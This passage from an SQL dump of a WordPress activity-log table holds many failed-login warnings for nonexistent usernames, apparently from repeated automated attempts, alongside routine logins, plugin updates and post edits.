not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40559,'2023-10-30 12:24:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40560,'2023-10-30 12:36:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40561,'2023-10-30 12:49:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40562,'2023-10-30 13:03:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40563,'2023-10-30 13:17:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40564,'2023-10-30 13:31:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40565,'2023-10-30 13:45:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40566,'2023-10-30 13:59:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40567,'2023-10-30 14:13:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40568,'2023-10-30 14:26:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40569,'2023-10-30 14:40:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40570,'2023-10-30 14:55:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40571,'2023-10-30 15:09:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40572,'2023-10-30 15:24:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40573,'2023-10-30 15:35:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40574,'2023-10-30 15:38:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40575,'2023-10-30 15:48:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40576,'2023-10-30 15:52:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40577,'2023-10-30 16:00:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40578,'2023-10-30 16:07:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40579,'2023-10-30 16:12:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40580,'2023-10-30 16:21:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40581,'2023-10-30 16:25:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40582,'2023-10-30 16:35:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40583,'2023-10-30 16:38:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40584,'2023-10-30 16:49:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40585,'2023-10-30 16:51:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40586,'2023-10-30 17:04:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40587,'2023-10-30 17:04:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40588,'2023-10-30 17:17:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40589,'2023-10-30 17:18:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40590,'2023-10-30 17:19:54','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40591,'2023-10-30 17:29:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40592,'2023-10-30 17:33:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40593,'2023-10-30 17:42:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40594,'2023-10-30 17:47:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40595,'2023-10-30 17:55:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40596,'2023-10-30 18:02:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40597,'2023-10-30 18:08:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40598,'2023-10-30 18:17:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40599,'2023-10-30 18:21:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40600,'2023-10-30 18:32:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40601,'2023-10-30 18:34:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40602,'2023-10-30 18:47:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40603,'2023-10-30 18:47:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40604,'2023-10-30 19:00:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40605,'2023-10-30 19:03:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40606,'2023-10-30 19:13:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40607,'2023-10-30 19:18:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40608,'2023-10-30 19:26:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40609,'2023-10-30 19:32:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40610,'2023-10-30 19:39:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40611,'2023-10-30 19:47:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40612,'2023-10-30 19:52:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40613,'2023-10-30 20:02:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40614,'2023-10-30 20:06:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40615,'2023-10-30 20:16:37','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40616,'2023-10-30 20:18:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40617,'2023-10-30 20:19:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40618,'2023-10-30 20:32:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40619,'2023-10-30 20:32:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40620,'2023-10-30 20:33:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40621,'2023-10-30 20:46:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40622,'2023-10-30 20:48:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40623,'2023-10-30 20:59:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40624,'2023-10-30 21:04:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(41091,'2023-11-12 14:38:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4eca626bf6a1fe82519f45e06feb0a87','other'),(41089,'2023-11-12 04:06:41','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41090,'2023-11-12 14:38:08','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4eca626bf6a1fe82519f45e06feb0a87','other'),(41088,'2023-11-12 04:05:44','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41087,'2023-11-12 03:59:40','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','6033fa805659c868fc2e881012e1e4a3','wp_user'),(41085,'2023-11-12 03:41:04','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41086,'2023-11-12 03:58:12','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41084,'2023-11-12 03:40:19','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41083,'2023-11-12 03:37:50','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41082,'2023-11-12 03:33:14','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','00d09432fdc26a4bc2d24e3c00a01759','wp_user'),(41081,'2023-11-12 03:33:13','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','701bd3a5dfc55211672bee53d56e7b81','wp_user'),(41080,'2023-11-12 03:33:02','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','800ca4195f7d23ac5716dd9038abd97e','wp_user'),(41078,'2023-11-12 03:26:40','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41079,'2023-11-12 03:32:59','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','a2e46cc96de6bb0e5fed0a3d573d6a51','wp_user'),(41077,'2023-11-11 18:35:03','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','d14c08e7e003943e442b66d1064bb2c0','wp'),(41076,'2023-11-11 17:26:07','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','991946b9ad1bc85286b67fc061643910','other'),(41075,'2023-11-11 14:36:24','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','6ca708f7d0fb83cc3d3e062b1c0e153b','wp'),(41074,'2023-11-10 16:44:59','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','277a6cd959e5880ccc1b7710f963a412','wp'),(41072,'2023-11-09 16:03:51','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','670ead89aa8cbd707cc5a2099ee73109','wp'),(41073,'2023-11-10 02:39:05','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','9cfb3965334f0afcd4cc3f23c2360e0d','other'),(41071,'2023-11-09 01:32:50','SimpleCoreUpdatesLogger','notice','WordPress auto-updated to {new_version} from {prev_version}','2af811d2db2a5258e6bbf5f2629ffd17','wp'),(41070,'2023-11-09 01:31:39','AvailableUpdatesLogger','notice','Found an update to WordPress','9c214a4ad6dbb686590a9f6b5157d73c','wp'),(41069,'2023-11-08 18:13:31','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41067,'2023-11-08 18:11:15','SimpleThemeLogger','info','Updated theme \"{theme_name}\"','c743f35d3a628d821d4940ce66d2ae16','wp_user'),(41068,'2023-11-08 18:11:36','SimpleThemeLogger','info','Deleted theme \"{theme_name}\"','d969c64adf9056b8b741d176a1f04ac3','wp_user'),(41066,'2023-11-08 18:09:31','SimpleCoreUpdatesLogger','notice','Updated WordPress to {new_version} from {prev_version}','428bf3136441f9bacd4ba0a1388cbbf8','wp_user'),(41065,'2023-11-08 18:05:28','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','7c66e3d87d28b8dede63db77ac964b97','wp_user'),(41064,'2023-11-08 18:05:17','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','5a5bcf17e7a3f56729d329bf166f9fa6','wp_user'),(41063,'2023-11-08 18:04:57','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','1005db7f04fa3873baf901d5bcfdbcc9','wp_user'),(41062,'2023-11-08 18:04:43','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','891266b75594baf5ff1d31f1a4fa1346','wp_user'),(41060,'2023-11-08 16:16:06','SimpleUserLogger','info','Logged in','6cfe89de80872fcb511ec767d68e445a','wp_user'),(41061,'2023-11-08 16:34:45','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','57b5eca6d304418eea320ee5f7e58e8e','other'),(41059,'2023-11-08 15:36:39','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','9da9505018bd2dfc1818ef8c8ef9d811','wp'),(41058,'2023-11-08 12:29:58','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','33d511081a7832b1357a47cf99ad5813','wp'),(41057,'2023-11-08 11:52:52','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','fcf1f9fb64fa5dd47301e03615700cec','wp'),(41056,'2023-11-08 11:02:28','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','bb93d5ce48c3d08dea601300dedd2326','wp'),(41054,'2023-11-07 19:58:51','AvailableUpdatesLogger','notice','Found an update to WordPress','35bd1110a522a51814d1bdc14180e96c','wp'),(41055,'2023-11-08 00:59:17','AvailableUpdatesLogger','notice','Found an update to theme \"{theme_name}\"','fcbe2281eb41ef55c0cd83fe21134e16','wp'),(41053,'2023-11-07 16:56:50','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41052,'2023-11-07 16:56:26','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','bb6ca223b1b260637e843ad96b250463','wp_user'),(41050,'2023-11-07 16:51:46','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','6b1e668e11641f737c0644c371f4b277','wp'),(41051,'2023-11-07 16:51:47','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','0ad42d0c92bd9507b58e5dd998b87f94','wp_user'),(41049,'2023-11-07 16:47:11','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','78d5021d25fc9aca0141eab0cfb7ca70','wp_user'),(41048,'2023-11-07 16:46:19','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','c4cbf9eb4701043153d33f2ccbc5f90e','wp_user'),(41047,'2023-11-07 16:46:10','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','0046ab30897c7eb8217dee3071f00572','wp_user'),(41045,'2023-11-07 16:44:36','SimplePluginLogger','info','Deleted plugin \"{plugin_name}\"','a3bc4b3659a149ea0d50dfedb1980f4b','wp_user'),(41046,'2023-11-07 16:45:57','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','90de6cf2b06321dd5cdc61abe12ad17d','wp_user'),(41044,'2023-11-07 16:10:53','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to version {plugin_version} from {plugin_prev_version}','384833b95afdc13731382120972e5432','wp'),(41043,'2023-11-07 16:04:25','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41042,'2023-11-07 10:53:02','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','eadae553d925c958a772593d4b75ca33','wp'),(41040,'2023-11-07 03:19:55','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','2622d6bfa267aebab3fd468c577e66fc','wp'),(41041,'2023-11-07 04:08:10','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41039,'2023-11-07 02:34:33','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','f0ce71c1184f023cdc4d24b8ab0e684b','other'),(41037,'2023-11-07 02:25:46','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41038,'2023-11-07 02:33:02','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41036,'2023-11-06 19:51:54','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e2da7041d903618fcdb54662d10a6ea7','other'),(41035,'2023-11-06 18:08:02','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','be753bd4395d0e57465124dea17485ff','wp'),(41034,'2023-11-06 15:56:33','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','646169a1aaeb4c58f64783a5b86643c3','wp'),(41033,'2023-11-06 14:48:29','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','c2e3237b2008cb1e145a21273341f834','wp'),(41031,'2023-11-06 02:44:12','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ca12e2cb911b2a2dbea9b356ebeb71a6','other'),(41032,'2023-11-06 09:29:15','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','686714bb25c6b7e27e86ef747ca615cb','wp'),(41030,'2023-11-05 16:07:56','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','d2b0663d4aa54fd2efeb9ae66a002dde','wp'),(41101,'2023-11-12 22:32:44','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','ff7f3df7f18a592561b7136e6e838f66','wp'),(41100,'2023-11-12 22:12:10','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41098,'2023-11-12 22:03:56','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41099,'2023-11-12 22:04:52','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ef92f0fd1d19f700cd6d94fe14260887','wp_user'),(41097,'2023-11-12 18:27:27','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','148ece1a4eabd6724ac324414af75bc1','other'),(41096,'2023-11-12 17:46:33','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','8e72d15c6928826b7abba1bd2933a2f4','other'),(41095,'2023-11-12 17:41:14','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','857fbc9e4c9d39d0d7230114a94cf563','other'),(41093,'2023-11-12 16:12:42','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','9dffcf4b4a82b14f1e19d3ec7ac48215','other'),(41094,'2023-11-12 16:12:43','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','9dffcf4b4a82b14f1e19d3ec7ac48215','other'),(41092,'2023-11-12 16:04:31','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','9e987f641c10cb153d2bf9578afccccd','wp'),(38914,'2023-10-19 09:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38915,'2023-10-19 10:02:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38916,'2023-10-19 10:14:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38917,'2023-10-19 10:25:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38918,'2023-10-19 10:28:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38919,'2023-10-19 10:36:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38920,'2023-10-19 10:48:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38921,'2023-10-19 10:59:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38922,'2023-10-19 11:10:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38923,'2023-10-19 11:22:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38924,'2023-10-19 11:33:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38925,'2023-10-19 11:44:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38926,'2023-10-19 11:56:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38927,'2023-10-19 12:07:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38928,'2023-10-19 12:19:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38929,'2023-10-19 12:30:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38930,'2023-10-19 12:41:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38931,'2023-10-19 12:53:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38932,'2023-10-19 12:55:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','d5d9e3fc43b13ea00f2d05cd26141df7','other'),(38933,'2023-10-19 13:04:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38934,'2023-10-19 13:15:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38935,'2023-10-19 13:26:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38936,'2023-10-19 13:38:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38937,'2023-10-19 13:49:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38938,'2023-10-19 14:01:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38939,'2023-10-19 14:12:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38940,'2023-10-19 14:23:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38941,'2023-10-19 14:34:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38942,'2023-10-19 14:34:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38943,'2023-10-19 14:46:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38944,'2023-10-19 14:57:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38945,'2023-10-19 15:09:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38946,'2023-10-19 15:20:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38947,'2023-10-19 15:24:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38948,'2023-10-19 15:32:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38949,'2023-10-19 15:34:11','SimpleUserLogger','info','Logged in','c3f060ceaa2e121881a9c3a19b7ef67c','wp_user'),(38950,'2023-10-19 15:43:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38951,'2023-10-19 15:44:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38952,'2023-10-19 15:50:47','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','9c35592116c7bfd066935e07be86fc26','wp_user'),(38953,'2023-10-19 15:51:11','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','f27ccf05544418db6211049be351c93b','wp_user'),(38954,'2023-10-19 15:51:35','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','376da6a805ec9a14d05b259a591d746c','wp_user'),(38955,'2023-10-19 15:51:48','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','bb50b5f732a0790a82cd09256272459d','wp_user'),(38956,'2023-10-19 15:52:02','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','ec7d8506155b6f47af421c4fd1120ead','wp_user'),(38957,'2023-10-19 15:54:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38958,'2023-10-19 15:54:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38959,'2023-10-19 16:05:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not 